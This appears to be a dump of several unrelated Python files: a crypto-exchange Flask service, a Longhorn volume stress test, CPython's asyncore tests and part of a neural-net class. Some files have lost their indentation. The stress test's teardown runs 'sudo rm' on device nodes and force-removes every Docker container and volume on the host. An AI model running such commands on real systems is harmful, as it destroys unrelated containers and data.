# if okex_last_open_long_timestamp and now - okex_last_open_long_timestamp <= 1:
# logger.error("Double click: now: %s, last: %s" % (now, okex_last_open_long_timestamp))
# res['msg'] = u"请不要在1秒内多次点击开仓"
# return jsonify(res)
# okex_last_open_long_timestamp = now
# symbol_map = {'btc_usd': 'btc_usdt', 'eth_usd':'eth_usdt'}
# symbol = symbol
# contract = contract
# amount = amount
# if not (symbol in meta_ok_symbol and contract in meta_ok_contract and amount):
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# else:
# spot_balance_base = OkexSpotRest(symbol_map[symbol]).get_sell_balance_for_future()
# if spot_balance_base < float(amount) * 100:
# res['msg'] = u"现货账户余额不足:%s usdt" % spot_balance_base
# return jsonify(res)
# real_future_meta = symbol + '_' + contract
# Process(target=create_hedging_process, args=(float(amount), real_future_meta, symbol_map[symbol],)).start()
# # okexHedge = Hedging(float(amount), real_future_meta, symbol_map[symbol])
# # okexHedge.setDaemon(True)
# # okexHedge.start()
# res['msg'] = u"成功"
# res = {'result': True}
# return jsonify(res)
@app.route('/cancel/history/binance/orders', methods=['GET'])
def binance_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
bi = Binance('eth_usdt')
res = bi.get_our_history_orders()
return jsonify(res)
@app.route('/cancel/history/bitfinex/orders', methods=['GET'])
def bitfinex_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
bfx = TradingV1('eth_usdt')
res = bfx.get_our_history_orders()
return jsonify(res)
@app.route('/cancel/history/huobi/orders', methods=['GET'])
def huobi_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
loop = asyncio.new_event_loop()
hb = HuobiRest('eth_usdt', loop)
res = hb.get_our_history_orders()
return jsonify(res)
# @app.route('/cancel/okex_future/open_position', methods=['POST'])
# def open_okexf_long_orders():
# res = {'result': False}
# symbol_map = {'btc_usd': 'btc_usdt', 'eth_usd':'eth_usdt'}
# symbol = request.form.get('symbol', '')
# contract = request.form.get('contract', '')
# amount = request.form.get('amount', 0.0)
# if not (symbol in meta_ok_symbol and contract in meta_ok_contract and amount):
# return jsonify(res)
# else:
# real_future_meta = symbol + '_' + contract
# okexHedge = Hedging(float(amount), real_future_meta, symbol_map[symbol])
# # okexHedge.setDaemon(True)
# okexHedge.start()
# res = {'result': True}
# return jsonify(res)
if __name__ == "__main__":
os.environ[Constants.DQUANT_ENV] = "dev"
port = int(sys.argv[1]) if len(sys.argv) >= 2 else 5000
app.run(host='0.0.0.0', port=port)
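# Illustrative usage (assumes the service is running locally on the port chosen
# above, 5000 by default): the history endpoints are plain GET requests, e.g.
#   curl http://127.0.0.1:5000/cancel/history/binance/orders
#   curl http://127.0.0.1:5000/cancel/history/bitfinex/orders
#   curl http://127.0.0.1:5000/cancel/history/huobi/orders
# Each route builds its eth_usdt exchange client and returns that exchange's
# historical orders serialized with jsonify().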
|
teardown-test.py
|
import subprocess
import time
import random
import sys
import threading
import time
import os
import directio
import mmap
from os import path
import stat
import datetime
from multiprocessing import Process, Manager, Array, current_process, Lock
subprocess.call("sudo iscsiadm -m node --logout", shell=True)
subprocess.call("sudo rm /dev/longhorn/vol*", shell=True)
#subprocess.call("docker rm -fv `docker ps -a | grep rancher/longhorn | awk '{print $1}'`", shell=True)
subprocess.call("docker rm -fv `docker ps -qa`", shell=True)
subprocess.call("docker network rm longhorn-net", shell=True)
subprocess.call("docker network create --subnet=172.18.0.0/16 longhorn-net", shell=True)
NUM_PAGES = 16
PAGE_SIZE = 4096
DATA_LEN = NUM_PAGES * PAGE_SIZE
MAX_RETRY = 5
WAIT_TIMEOUT = 300
def readat_direct(dev, offset, length):
pg = offset / PAGE_SIZE
in_page_offset = offset % PAGE_SIZE
# either read less than a page, or whole pages
if in_page_offset != 0:
assert pg == (offset + length - 1) / PAGE_SIZE
to_read = PAGE_SIZE
else:
assert length % PAGE_SIZE == 0
to_read = length
pg_offset = pg * PAGE_SIZE
f = os.open(dev, os.O_DIRECT | os.O_RDONLY)
try:
os.lseek(f, pg_offset, os.SEEK_SET)
ret = directio.read(f, to_read)
except OSError as e:
print "%s: encounter error in readat_direct for %s" \
% (datetime.datetime.now(), dev)
raise
finally:
os.close(f)
return ret[in_page_offset: in_page_offset + length]
def writeat_direct(dev, offset, data):
pg = offset / PAGE_SIZE
# don't support across page write
assert pg == (offset + len(data) - 1) / PAGE_SIZE
pg_offset = pg * PAGE_SIZE
f = os.open(dev, os.O_DIRECT | os.O_RDWR)
m = mmap.mmap(-1, PAGE_SIZE)
try:
os.lseek(f, pg_offset, os.SEEK_SET)
pg_data = readat_direct(dev, pg_offset, PAGE_SIZE)
m.write(pg_data)
m.seek(offset % PAGE_SIZE)
m.write(data)
ret = directio.write(f, m)
except OSError as e:
print "%s: encounter error in readat_direct for %s" \
% (datetime.datetime.now(), dev)
raise
finally:
m.close()
os.close(f)
return ret
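# Illustrative example (not executed by this script): writing a single byte at
# an unaligned offset relies on the read-modify-write above, e.g.
#   writeat_direct("/dev/longhorn/vol1", 4096 + 17, "X")
# reads the surrounding 4 KiB page via readat_direct, patches byte 17 of that
# page inside the mmap buffer, and writes the whole page back with directio.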
def write_data(i, pattern):
for page in xrange(0, NUM_PAGES):
writeat_direct("/dev/longhorn/vol" + str(i), page * PAGE_SIZE, str(chr(pattern))*PAGE_SIZE)
def check_data(i, pattern):
for page in xrange(0, NUM_PAGES):
data = readat_direct("/dev/longhorn/vol" + str(i), page * PAGE_SIZE, PAGE_SIZE)
assert ord(data[0]) == pattern
def create_snapshot(controller):
return subprocess.check_output(("docker exec " + controller + " launch snapshot create").split()).rstrip()
def revert_snapshot(snap, controller):
subprocess.check_call("docker exec " + controller + " launch snapshot revert " + snap, shell = True)
def wait_for_dev_ready(i, iteration, controller):
dev = "/dev/longhorn/vol" + str(i)
init_time = time.time()
while time.time() - init_time < WAIT_TIMEOUT:
if os.path.exists(dev):
mode = os.stat(dev).st_mode
if stat.S_ISBLK(mode):
print "%s: iteration = %d thread = %d : Device ready after %.3f seconds" \
% (datetime.datetime.now(), iteration, i, time.time() - init_time)
return
time.sleep(0.05)
print "%s: iteration = %d thread = %d : FAIL TO WAIT FOR DEVICE READY, docker logs:" \
% (datetime.datetime.now(), iteration, i)
subprocess.call("docker logs " + controller, shell=True)
return
def wait_for_dev_deleted(i, iteration, controller):
dev = "/dev/longhorn/vol" + str(i)
init_time = time.time()
while time.time() - init_time < WAIT_TIMEOUT:
if not os.path.exists(dev):
print "%s: iteration = %d thread = %d : Device deleted after %.3f seconds" \
% (datetime.datetime.now(), iteration, i, time.time() - init_time)
return
time.sleep(0.05)
print "%s: iteration = %d thread = %d : FAIL TO WAIT FOR DEVICE DELETED, docker logs:" \
% (datetime.datetime.now(), iteration, i)
subprocess.call("docker logs " + controller, shell=True)
return
def run_test(thread, iterations):
for iteration in xrange(iterations):
replica1_ip = "172.18.%d.%d" % (iteration % 80 + 1, thread)
replica1 = subprocess.check_output(("docker run -d --name r1-%d-%d" % (iteration, thread) + \
" --net longhorn-net --ip %s --expose 9502-9504 -v /volume" % (replica1_ip) + \
" rancher/longhorn launch replica --listen %s:9502 --size %d /volume" \
% (replica1_ip, DATA_LEN)).split()).rstrip()
print "%s: iteration = %d thread = %d name = r1-%d-%d replica1 = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
replica1, replica1_ip)
replica2_ip = "172.18.%d.%d" % (iteration % 80 + 81, thread)
replica2 = subprocess.check_output(("docker run -d --name r2-%d-%d" % (iteration, thread) + \
" --net longhorn-net --ip %s --expose 9502-9504 -v /volume" % (replica2_ip) + \
" rancher/longhorn launch replica --listen %s:9502 --size %d /volume" \
% (replica2_ip, DATA_LEN)).split()).rstrip()
print "%s: iteration = %d thread = %d name = r2-%d-%d replica2 = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
replica2, replica2_ip)
controller_ip = "172.18.%d.%d" % (iteration % 80 + 161, thread)
controller_name = "c-%d-%d" % (iteration, thread)
started = False
count = 0
print "About to create controller for " + controller_name
while not started and count < MAX_RETRY:
try:
controller = subprocess.check_output(("docker run -d --name %s" % (controller_name) + \
" --net longhorn-net --ip %s --privileged -v /dev:/host/dev" % (controller_ip) + \
" -v /proc:/host/proc rancher/longhorn launch controller --frontend tgt" + \
" --replica tcp://%s:9502 --replica tcp://%s:9502 vol%d" \
% (replica1_ip, replica2_ip, thread)).split()).rstrip()
print "controller %s created as %s" % (controller_name, controller)
started = True
except subprocess.CalledProcessError as ex:
status = subprocess.check_output(
"docker ps -a -f NAME=%s --format {{.Status}}" \
% (controller_name), shell=True)
if status != "" and status.strip() != "Created":
raise ex
# Now we know it's the Docker race bug
print "Docker's bug result in failed to start controller, retrying: " + str(ex)
subprocess.call("docker rm -fv " + controller_name, shell=True)
time.sleep(1)
count += 1
assert started
wait_for_dev_ready(thread, iteration, controller)
print "%s: iteration = %d thread = %d name = c-%d-%d controller = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
controller, controller_ip)
pattern1 = int(255 * random.random())
write_data(thread, pattern1)
check_data(thread, pattern1)
snap = create_snapshot(controller)
assert snap != ""
pattern2 = int(255 * random.random())
write_data(thread, pattern2)
check_data(thread, pattern2)
if random.random() < 0.1:
print "%s: iteration = %d thread = %d sleep 30 seconds" \
% (datetime.datetime.now(), iteration, thread)
time.sleep(30)
revert_snapshot(snap, controller)
wait_for_dev_ready(thread, iteration, controller)
check_data(thread, pattern1)
subprocess.call("docker stop %s" % (controller), shell=True)
wait_for_dev_deleted(thread, iteration, controller)
subprocess.call("docker stop %s %s" % (replica1, replica2), shell=True)
subprocess.call("docker rm -fv %s %s %s" % (controller, replica1, replica2), shell=True)
workers = []
for thread in range(20):
p = Process(target = run_test, args = (thread + 1, 1000))
workers.append(p)
p.start()
for p in workers:
p.join()
|
test_asyncore.py
|
# expected: fail
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import warnings
import errno
import struct
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink, HOST
from StringIO import StringIO
try:
import threading
except ImportError:
threading = None
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
# XXX - this test is supposed to be removed in next major Python
# version
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
self.assertRaisesRegexp(AttributeError, 'dispatcher instance',
getattr, d, 'foo')
# cheap inheritance with the underlying socket is supposed
# to still work but a DeprecationWarning is expected
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
family = d.family
self.assertEqual(family, socket.AF_INET)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@test_support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
port = test_support.bind_port(sock)
cap = StringIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join()
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
with file(TESTFN, 'w') as h:
h.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class TCPServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, handler=BaseTestHandler, host=HOST, port=0):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()[:2]
def handle_accept(self):
pair = self.accept()
if pair is not None:
self.handler(pair[0])
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, address):
BaseTestHandler.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI(unittest.TestCase):
def tearDown(self):
asyncore.close_all()
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self):
BaseTestHandler.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((HOST, 0))
self.listen(5)
self.address = self.socket.getsockname()[:2]
def handle_accept(self):
self.flag = True
server = TestListener()
client = BaseClient(server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send('x' * 1024)
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
class TestClient(BaseClient):
def handle_expt(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(chr(244), socket.MSG_OOB)
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = TCPServer()
client = BaseClient(server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, socket.AF_INET)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
def test_bind(self):
s1 = asyncore.dispatcher()
s1.create_socket(socket.AF_INET, socket.SOCK_STREAM)
s1.bind((HOST, 0))
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (HOST, port))
def test_set_reuse_addr(self):
sock = socket.socket()
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket())
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.create_socket(socket.AF_INET, socket.SOCK_STREAM)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@test_support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
server = TCPServer()
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=500))
t.start()
self.addCleanup(t.join)
for x in xrange(20):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except socket.error:
pass
finally:
s.close()
class TestAPI_UseSelect(BaseTestAPI):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UsePoll(BaseTestAPI):
use_poll = True
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll, TestAPI_UseSelect,
TestAPI_UsePoll, FileWrapperTest]
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
HIVE MIND.py
|
import datetime
class hivemind:
class mind:
class neurone:
def __init__(self,name,resistance=0,accelerate=0.999,brake=0.999,bayeslearningrate=10):
import random
self.learningrate={}
self.bayeslearningrate=bayeslearningrate
self.inputs={}
self.bias={}
self.bayesbias={}
if isinstance(resistance,str):
                    self.resistance=random.random()
else:
self.resistance=resistance
self.pain=2
self.fired=[]
self.name=name
self.temp={}
self.me=0
self.accelerate=accelerate
self.brake=brake
def forward(self,imp={},bayes={},error=0):
import random
a=0
c=0
for i in bayes:
if i in self.bayesbias:
try:
c+=(self.bayesbias[i]*bayes[i])
except Exception as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
print(c)
print(self.bayesbias[i])
print(bayes[i])
print(i)
print(bayes)
input("pause in forward")
else:
if error==2:
print(i)
                            print(self.bayesbias)
input("pause")
self.bayesbias[i]=random.random()
self.learningrate[i]=random.random()
c+=self.bayesbias[i]
c=self.outputactivation(c)
if error==1:
print(self.name)
print(c)
input()
if c > self.resistance or self.name=="output":
a=0
for i in imp:
if i in self.bias:
a+=(self.bias[i]*imp[i])
else:
self.bias[i]=random.random()
a=self.outputactivation(a)
self.fired=imp
self.pain=a
return [self.name,a,c]
else:
return []
def backwards(self,actual,estimate,lisp,error=0):
import random
if self.name in lisp or self.name=='output':
if len(self.fired)>0:
a=0
c=actual-abs(estimate)
d=estimate/actual
e=0
if c > 0:
if self.pain < 0:
if actual >0:
sel=0
else:
sel=1
else:
sel=1
else:
if self.pain < 0:
if actual >0:
sel=1
else:
sel=0
else:
sel=0
for i in self.fired:
if i in self.temp:
                                if sel==1 and self.temp[i] == 1:
self.learningrate[i]=self.learningrate[i]*self.accelerate
else:
self.learningrate[i]=self.learningrate[i]*self.brake
#self.temp[i]=c
try:
if c>0:
for i in self.fired:
self.bias[i]+=self.learningrate[i]
self.bayesbias[i]+=(self.learningrate[i]/self.bayeslearningrate)
self.temp[i]=sel
else:
for i in self.fired:
self.bias[i]-=self.learningrate[i]
self.bayesbias[i]-=(self.learningrate[i]/self.bayeslearningrate)
self.temp[i]=sel
except Exception as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
print(self.fired)
print(i)
input("Error in backwards")
temp=self.fired.copy()
self.fired=[]
return temp
            # mind needs to take the reply, group all the returns, and then feed them into the next row.
            # if mind gets an empty dict back for a whole row, it needs to cycle through the neurones and top up the bayes dict
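            # Illustrative sketch (hypothetical inputs, mirroring how learnbook drives it):
            #   m = hivemind.mind(4, 5)
            #   estimate = m.forwardpage(["Status:Open", "Team:Alpha", 3.0])
            #   m.backapage(actual=42.0, estimate=estimate)
            # forwardpage() feeds each cortex row in turn and keeps only the neurones that
            # fired; backapage() then walks the rows in reverse and updates only the
            # neurones whose names appear in the previous row's fired list.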
def nonresponse(self,estimate):
import random
for i in estimate:
if i !=self.name:
if i in self.bayesbias:
self.bayesbias[i]+=1
else:
self.bayesbias[i]=random.random()+1
self.learningrate[i]=random.random()
def experience(self):
self.accelerate-=0.00000001
self.brake-=0.00000001
if self.brake<0.00000001:
self.brake=0.00000001
if self.accelerate < 1.00000001:
self.accelerate=1.00000001
def reset(self):
self.fired=[]
class Relu:
def outputactivation(self,x):
if x > 0:
return x
else:
return (x*0.1)
class Sigmoid:
def outputactivation(self,x):
import math
return 1 / (1 + math.exp(-x))
class Tanh:
def outputactivation(self,x):
import math
x=math.tanh(x)
return x
class sigmoidneurone(Sigmoid,neurone):
pass
class reluneurone(Relu,neurone):
pass
class tanhneurone(Tanh,neurone):
pass
def __init__(self,width,depth,repeat=0,resistance=0,bayeslearningrate=10,linearegression=0):
self.outputbias={}
self.mind=[]
self.source=[]
self.fired={}
self.repeat=repeat
self.me=0
self.critime={}
self.resistance=resistance
c=0
for i in range(depth):
cortex=[]
for w in range(width):
c+=1
name=str("No:"+str(c)+" row:"+str(i)+" width:"+str(w))
cortex.append(self.reluneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate))
